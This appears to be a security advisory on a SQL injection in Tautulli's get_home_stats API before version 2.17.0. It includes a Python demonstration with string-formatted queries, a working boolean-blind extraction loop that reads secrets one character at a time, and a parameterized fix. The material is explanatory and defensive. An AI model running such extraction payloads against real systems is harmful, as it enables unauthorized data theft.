Impact
The vulnerability allows authenticated attackers holding the Tautulli admin API key to inject arbitrary SQL through the /api/v2?cmd=get_home_stats endpoint. The backend formats the "before", "after", "section_id", and "user_id" query parameters directly into a SQL statement with Python string formatting instead of binding them as parameters. Because the attacker controls part of the WHERE clause, the response can be made to differ depending on whether an injected condition is true, which permits boolean-blind inference of values from the SQLite database and therefore exfiltration of any data Tautulli stores. The weakness is a classic SQL injection (CWE-89) arising from improper input validation (CWE-20).
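The following is an added example, not Tautulli's own code, showing the pattern the advisory describes: a query built with string formatting, a boolean-blind extraction loop that reads a secret one character at a time through nothing but a "zero or non-zero rows" oracle, and a parameterized form that rejects the same payload. The table names, columns, rows and function names are constructed for the example and are not Tautulli's real schema or API.

```python
import sqlite3

# Constructed sample database standing in for Tautulli's SQLite store.
# Schema and rows are assumptions for this example, not Tautulli's real schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE session_history (
            id INTEGER PRIMARY KEY, user_id INTEGER, section_id INTEGER, started INTEGER);
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, api_token TEXT);
        INSERT INTO session_history VALUES (1, 1, 1, 1000), (2, 2, 1, 2000), (3, 1, 2, 3000);
        INSERT INTO users VALUES (1, 'alice', 'tok-a'), (2, 'bob', 'tok-b');
    """)
    return conn


def vulnerable_query(conn, user_id, section_id):
    # The pattern the advisory describes: request parameters formatted straight
    # into the SQL text, so anything after a digit becomes part of the WHERE clause.
    sql = ("SELECT COUNT(*) FROM session_history "
           "WHERE user_id = %s AND section_id = %s" % (user_id, section_id))
    return conn.execute(sql).fetchone()[0]


def safe_query(conn, user_id, section_id):
    # One hardened form (an assumption, not Tautulli's actual fix): coerce the
    # parameters to the type the query expects, then bind them as placeholders.
    sql = ("SELECT COUNT(*) FROM session_history "
           "WHERE user_id = ? AND section_id = ?")
    return conn.execute(sql, (int(user_id), int(section_id))).fetchone()[0]


def rejects_payload(conn, user_id, section_id):
    # True when the hardened query refuses a non-integer value outright.
    try:
        safe_query(conn, user_id, section_id)
    except ValueError:
        return True
    return False


def blind_extract(conn, query_fn, sql_expr, max_len=32):
    """Boolean-blind inference: for each position, probe every printable byte by
    appending 'AND unicode(substr((expr),pos,1)) = c' to a condition that is
    otherwise true (user_id 1, section_id 1 matches one row). The only signal
    used is whether the count is non-zero; substr past the end of the string
    yields '' and unicode('') is NULL, so the loop stops at the true length."""
    result = ""
    for pos in range(1, max_len + 1):
        found = None
        for c in range(32, 127):
            payload = "1 AND unicode(substr((%s),%d,1)) = %d" % (sql_expr, pos, c)
            if query_fn(conn, "1", payload) > 0:
                found = chr(c)
                break
        if found is None:
            break
        result += found
    return result


if __name__ == "__main__":
    db = build_db()
    secret = "SELECT username FROM users WHERE user_id = 2"
    print("blind-extracted:", blind_extract(db, vulnerable_query, secret))
    print("hardened query rejects payload:", rejects_payload(db, "1", "1 AND 1=1"))
```

The extraction loop needs roughly 95 requests per recovered character in the worst case; against a real target it would be driven over HTTP with the API key in each request rather than against a local function, but the oracle (a response that differs when the injected condition holds) is the same.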
Affected Systems
Affected systems are instances of Tautulli, the monitoring and tracking tool for Plex Media Server. Installations running Tautulli 2.14.2 through 2.16.x (inclusive) are affected via the "before" and "after" parameters, while versions from 2.1.0-beta through 2.16.x are also affected via the "section_id" and "user_id" parameters. All builds prior to 2.17.0 are therefore vulnerable; 2.17.0 is the patched release. Tautulli is a Python application that runs on various operating systems, and the vulnerability is present wherever the affected API endpoint is reachable.
Risk and Exploitability
With a CVSS score of 4.9, the vulnerability is rated medium. No EPSS score is available, so the likelihood of exploitation in the wild is unclear, but the attacker only needs a valid admin API key to craft the malicious request. Because the endpoint is exposed over the network and the injection happens server-side when the query is built, an attacker who guesses or compromises the key can exfiltrate data without any further privilege escalation. The issue is not listed in the CISA KEV catalog, so no confirmed in-the-wild exploitation has been recorded there; absence from KEV is not evidence that exploitation has not occurred. Nevertheless, the potential impact on confidentiality justifies prompt remediation, and the admin API key should be rotated if there is any doubt about its secrecy.
OpenCVE Enrichment